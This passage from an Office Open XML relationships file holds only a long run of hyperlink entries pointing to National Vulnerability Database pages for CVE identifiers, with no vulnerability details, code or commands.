Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86748" TargetMode="External" Id="rId662" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86777" TargetMode="External" Id="rId663" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87747" TargetMode="External" Id="rId664" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87810" TargetMode="External" Id="rId665" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87820" TargetMode="External" Id="rId666" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-15690" TargetMode="External" Id="rId667" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-46808" TargetMode="External" Id="rId668" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18796" TargetMode="External" Id="rId669" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19398" TargetMode="External" Id="rId670" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-32639" TargetMode="External" Id="rId671" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53495" TargetMode="External" Id="rId672" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55421" TargetMode="External" Id="rId673" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55535" TargetMode="External" Id="rId674" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83541" TargetMode="External" Id="rId675" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87015" TargetMode="External" Id="rId676" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87872" TargetMode="External" Id="rId677" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21085" TargetMode="External" Id="rId678" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21093" TargetMode="External" Id="rId679" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21097" TargetMode="External" Id="rId680" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21101" TargetMode="External" Id="rId681" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21102" TargetMode="External" Id="rId682" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21104" TargetMode="External" Id="rId683" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65979" TargetMode="External" Id="rId684" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70425" TargetMode="External" Id="rId685" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-11363" TargetMode="External" Id="rId686" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-14505" TargetMode="External" Id="rId687" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19201" TargetMode="External" Id="rId688" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55569" TargetMode="External" Id="rId689" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2023-54392" TargetMode="External" Id="rId690" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2024-58380" TargetMode="External" Id="rId691" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-70340" TargetMode="External" Id="rId692" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17443" TargetMode="External" Id="rId693" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17622" TargetMode="External" Id="rId694" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17631" TargetMode="External" Id="rId695" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19778" TargetMode="External" Id="rId696" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19855" TargetMode="External" Id="rId697" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-34836" TargetMode="External" Id="rId698" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-34949" TargetMode="External" Id="rId699" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-38343" TargetMode="External" Id="rId700" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-38998" TargetMode="External" Id="rId701" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-46370" TargetMode="External" Id="rId702" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-46371" TargetMode="External" Id="rId703" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48786" TargetMode="External" Id="rId704" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49455" TargetMode="External" Id="rId705" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53524" TargetMode="External" Id="rId706" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53583" TargetMode="External" Id="rId707" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53586" TargetMode="External" Id="rId708" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53769" TargetMode="External" Id="rId709" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54622" TargetMode="External" Id="rId710" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54624" TargetMode="External" Id="rId711" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54732" TargetMode="External" Id="rId712" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55221" TargetMode="External" Id="rId713" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55531" TargetMode="External" Id="rId714" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55588" TargetMode="External" Id="rId715" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55618" TargetMode="External" Id="rId716" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61908" TargetMode="External" Id="rId717" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62326" TargetMode="External" Id="rId718" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68516" TargetMode="External" Id="rId719" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73255" TargetMode="External" Id="rId720" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73258" TargetMode="External" Id="rId721" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73788" TargetMode="External" Id="rId722" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75162" TargetMode="External" Id="rId723" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75165" TargetMode="External" Id="rId724" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75370" TargetMode="External" Id="rId725" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75466" TargetMode="External" Id="rId726" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75509" TargetMode="External" Id="rId727" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75602" TargetMode="External" Id="rId728" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75861" TargetMode="External" Id="rId729" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78481" TargetMode="External" Id="rId730" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79513" TargetMode="External" Id="rId731" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79514" TargetMode="External" Id="rId732" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79522" TargetMode="External" Id="rId733" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79728" TargetMode="External" Id="rId734" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80128" TargetMode="External" Id="rId735" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80177" TargetMode="External" Id="rId736" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84306" TargetMode="External" Id="rId737" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84365" TargetMode="External" Id="rId738" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84377" TargetMode="External" Id="rId739" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85117" TargetMode="External" Id="rId740" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86347" TargetMode="External" Id="rId741" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86408" TargetMode="External" Id="rId742" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86739" TargetMode="External" Id="rId743" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86764" TargetMode="External" Id="rId744" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87014" TargetMode="External" Id="rId745" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87073" TargetMode="External" Id="rId746" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87429" TargetMode="External" Id="rId747" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87436" TargetMode="External" Id="rId748" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87437" TargetMode="External" Id="rId749" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87441" TargetMode="External" Id="rId750" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87443" TargetMode="External" Id="rId751" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87446" TargetMode="External" Id="rId752" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87447" TargetMode="External" Id="rId753" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87454" TargetMode="External" Id="rId754" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87459" TargetMode="External" Id="rId755" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87468" TargetMode="External" Id="rId756" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87473" TargetMode="External" Id="rId757" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87475" TargetMode="External" Id="rId758" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87476" TargetMode="External" Id="rId759" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87477" TargetMode="External" Id="rId760" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87478" TargetMode="External" Id="rId761" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87483" TargetMode="External" Id="rId762" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87490" TargetMode="External" Id="rId763" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87493" TargetMode="External" Id="rId764" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87503" TargetMode="External" Id="rId765" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87513" TargetMode="External" Id="rId766" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87515" TargetMode="External" Id="rId767" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87519" TargetMode="External" Id="rId768" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87522" TargetMode="External" Id="rId769" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87532" TargetMode="External" Id="rId770" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87535" TargetMode="External" Id="rId771" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87541" TargetMode="External" Id="rId772" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87545" TargetMode="External" Id="rId773" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87549" TargetMode="External" Id="rId774" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87565" TargetMode="External" Id="rId775" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87580" TargetMode="External" Id="rId776" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87584" TargetMode="External" Id="rId777" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87589" TargetMode="External" Id="rId778" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87591" TargetMode="External" Id="rId779" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87593" TargetMode="External" Id="rId780" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87600" TargetMode="External" Id="rId781" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87603" TargetMode="External" Id="rId782" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87610" TargetMode="External" Id="rId783" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87620" TargetMode="External" Id="rId784" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87623" TargetMode="External" Id="rId785" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87626" TargetMode="External" Id="rId786" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87627" TargetMode="External" Id="rId787" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87629" TargetMode="External" Id="rId788" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87631" TargetMode="External" Id="rId789" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87724" TargetMode="External" Id="rId790" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87809" TargetMode="External" Id="rId791" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88000" TargetMode="External" Id="rId792" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88002" TargetMode="External" Id="rId793" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-13709" TargetMode="External" Id="rId794" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17149" TargetMode="External" Id="rId795" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19634" TargetMode="External" Id="rId796" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19945" TargetMode="External" Id="rId797" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54746" TargetMode="External" Id="rId798" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62861" TargetMode="External" Id="rId799" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75966" TargetMode="External" Id="rId800" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77186" TargetMode="External" Id="rId801" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77187" TargetMode="External" Id="rId802" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79974" TargetMode="External" Id="rId803" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82081" TargetMode="External" Id="rId804" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83534" TargetMode="External" Id="rId805" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-13148" TargetMode="External" Id="rId806" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-43980" TargetMode="External" Id="rId807" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44476" TargetMode="External" Id="rId808" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53600" TargetMode="External" Id="rId809" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63379" TargetMode="External" Id="rId810" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79973" TargetMode="External" Id="rId811" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84308" TargetMode="External" Id="rId812" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86203" TargetMode="External" Id="rId813" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86749" TargetMode="External" Id="rId814" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86774" TargetMode="External" Id="rId815" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87047" TargetMode="External" Id="rId816" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-41987" TargetMode="External" Id="rId817" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49311" TargetMode="External" Id="rId818" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53937" TargetMode="External" Id="rId819" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55373" TargetMode="External" Id="rId820" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71429" TargetMode="External" Id="rId821" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71616" TargetMode="External" Id="rId822" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87732" TargetMode="External" Id="rId823" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87733" TargetMode="External" Id="rId824" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2022-30983" TargetMode="External" Id="rId825" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19797" TargetMode="External" Id="rId826" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21103" TargetMode="External" Id="rId827" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-37710" TargetMode="External" Id="rId828" /><Relationship 